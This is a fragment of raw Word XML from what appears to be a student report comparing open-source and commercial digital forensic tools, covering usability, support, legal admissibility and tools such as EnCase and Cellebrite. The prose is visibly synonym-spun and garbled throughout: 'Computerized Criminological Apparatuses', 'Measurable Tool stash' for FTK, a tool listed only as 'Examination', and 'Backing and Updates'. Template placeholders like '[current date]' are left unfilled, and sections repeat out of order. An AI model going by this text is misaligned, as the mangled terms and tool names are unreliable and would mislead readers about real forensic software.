    <w:p w14:paraId="1CC9AFFB" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Usability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21CACC" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Business devices are frequently planned with easy to understand interfaces, making them open to a more extensive crowd, including those without broad specialized skill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DA9E9" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: A few clients might find the connection point restricting contrasted with the adaptability of open-source instruments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A86870" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E0A173" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AA6F49" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F37AFF" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031C1EA9" w14:textId="3C7BEB02" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Backing and Updates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325855F9" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Business instruments normally accompany devoted help and customary updates, guaranteeing clients approach the most recent elements and security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6F1AD" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cons: Backing might be restricted by the seller's accessibility, and updates probably won't be just about as regular as the quick moving advancement found in open-source networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D22084" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Legitimate Contemplations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834C5BE" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Business apparatuses frequently accompany lawful affirmations, giving confirmation with respect to the acceptability of proof in legal procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92DBEB" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: The legitimateness of open-source devices may be addressed in certain wards, and guaranteeing their utilization agrees with lawful norms is the obligation of the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BB4AA" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD59EDF" w14:textId="18525C20" w:rsidR="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The decision between open-source and business measurable devices relies upon elements like financial plan, client skill, explicit prerequisites, and lawful contemplations. Associations frequently track down an equilibrium by integrating a blend of both, utilizing open-source instruments for explicit errands and depending on business devices for complete legal examinations. Eventually, the reasonableness of an instrument relies upon the exceptional requirements and limitations of the client or association.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4FFDC" w14:textId="16F8524C" w:rsidR="009F3DB4" w:rsidRDefault="009F3DB4" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F79EA00" w14:textId="1312EB47" w:rsidR="009F3DB4" w:rsidRDefault="009F3DB4" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D8BE23" w14:textId="31031929" w:rsidR="009F3DB4" w:rsidRDefault="009F3DB4" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE90891" w14:textId="6B189DBF" w:rsidR="009F3DB4" w:rsidRDefault="009F3DB4" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A689436" w14:textId="090A9DC8" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7753C40A" w14:textId="12DA027E" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509E541E" w14:textId="650DF384" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6343E904" w14:textId="3F4F2508" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4C70EE" w14:textId="4195502C" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18318F8A" w14:textId="405C55A8" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314EF489" w14:textId="3D07F1D4" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D5257C" w14:textId="300BED39" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54988231" w14:textId="79C76D83" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C12104" w14:textId="761C7BFA" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCD2AD2" w14:textId="02F07DA7" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F112E75" w14:textId="31302097" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5F026C" w14:textId="3DEC9A3D" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E5E80F" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AF35C7" w14:textId="246D187A" w:rsidR="009F3DB4" w:rsidRPr="0044529A" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044529A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tools Analysis Report - As a part of Final Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850D01F" w14:textId="1F4CF9E6" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671BAEB7" w14:textId="2C0A8B3B" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8C2DBA" w14:textId="0E8D52AF" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C7141A" w14:textId="560B2636" w:rsidR="006A553D" w:rsidRPr="00171782" w:rsidRDefault="00171782" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D04522" w14:textId="1D1FC4A1" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensic instruments are very important when looking into and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> digital evidence. This report means to give an outline of the present status of these instruments, with an emphasis on their elements and capacities. In addition, in order to assist in making decisions, we will compare and contrast open-source and paid forensic tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F8CC1E" w14:textId="7A3CDC15" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD40E03" w14:textId="612A50A5" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F64B5B1" w14:textId="459B026B" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBB7F87" w14:textId="20AC4133" w:rsidR="006A553D" w:rsidRPr="00171782" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Present status of Computerized Criminological Apparatuses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1835B6" w14:textId="669E35CA" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD14E86" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Give a concise outline of the computerized criminological instruments scene, featuring key patterns, progressions, and difficulties as of [current date].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833B028" w14:textId="1DC97A52" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Highlights and Abilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C21F6F" w14:textId="77777777" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Investigate the highlights and abilities of conspicuous advanced legal instruments, including yet not restricted to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A858EA" w14:textId="4C40B08E" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EnCase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967CA0C" w14:textId="0150B561" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Measurable Tool stash (FTK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEFB50" w14:textId="104AEFB5" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Examination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3606B0" w14:textId="25DA9F57" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Celle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>brite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D7EB9" w14:textId="34BE8D0D" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Some other devices of relevance]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681359B8" w14:textId="2B15FE88" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparison of Open-Source and Commercial Forensic Tools Cost Analysis </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Take into account</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> financial constraints and potential feature trade-offs when comparing the costs of open-source and commercial tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965D1DE" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62310C4F" w14:textId="14BB1B0A" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usability and Community Support Compare and contrast the ease of use of commercial tools with the level of community support for open-source software. Examine the effect on in general ease of use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB22AAA" w14:textId="04C5D2B7" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34317BF1" w14:textId="696C8EA3" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A8E500" w14:textId="77777777" w:rsidR="00171782" w:rsidRPr="006A553D" w:rsidRDefault="00171782" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641B67D0" w14:textId="69090926" w:rsidR="006A553D" w:rsidRPr="00171782" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00171782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Customization versus Out-of-the-Case Usefulness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A8F47" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Look at the degree of customization accessible in open-source apparatuses and contrast it and the out-of-the-container usefulness of business devices. Consider the specialized aptitude expected for customization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35073BCF" w14:textId="67044F61" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B662477" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="006A553D" w:rsidRDefault="00E72A42" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718E43B2" w14:textId="1AB0F1B1" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
